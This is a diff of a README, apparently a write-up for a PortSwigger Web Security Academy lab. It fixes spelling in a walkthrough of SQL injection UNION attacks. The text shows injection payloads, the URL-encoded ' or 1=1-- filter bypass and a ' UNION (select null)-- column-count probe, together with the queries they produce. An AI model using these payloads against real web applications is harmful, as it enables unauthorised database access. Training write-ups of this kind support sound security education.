frank-leitner/portswigger-websecurity-academy/01-sqli/SQL_injection_UNION_attack,_determining_the_number_of_columns_returned_by_the_query/README.md

 SELECT * FROM someTable WHERE category = 'Accessories''
 ```

 Try the good case by injecting something that results in a valid query: `/filter?category=Accessories%27%20or%201=1--`.
-This results in a query like this, returning all rows and commenting the erronious single quote and anything that might come after:
+This results in a query like this, returning all rows and commenting out the erroneous single quote and anything that might come after:

 ```sql
 SELECT * FROM someTable WHERE category = 'Accessories' or 1=1--'
 ```

-It returns the same content as with no filter, this is an indication that whatever would come afterwards and is commented out does not interfere with the result.
+It returns the same content as with no filter, this is an indication that whatever would come afterward and is commented out does not interfere with the result.

-### Count colums by UNION SELECT
+### Count columns by UNION SELECT

-In a UNION, the result sets need to contain the same number of colums.
+In a UNION, the result sets need to contain the same number of columns.
 Injecting `' UNION (select null)--` will produce a server error.

 ```sql
 SELECT * FROM someTable WHERE category = 'Accessories' UNION (select null)--'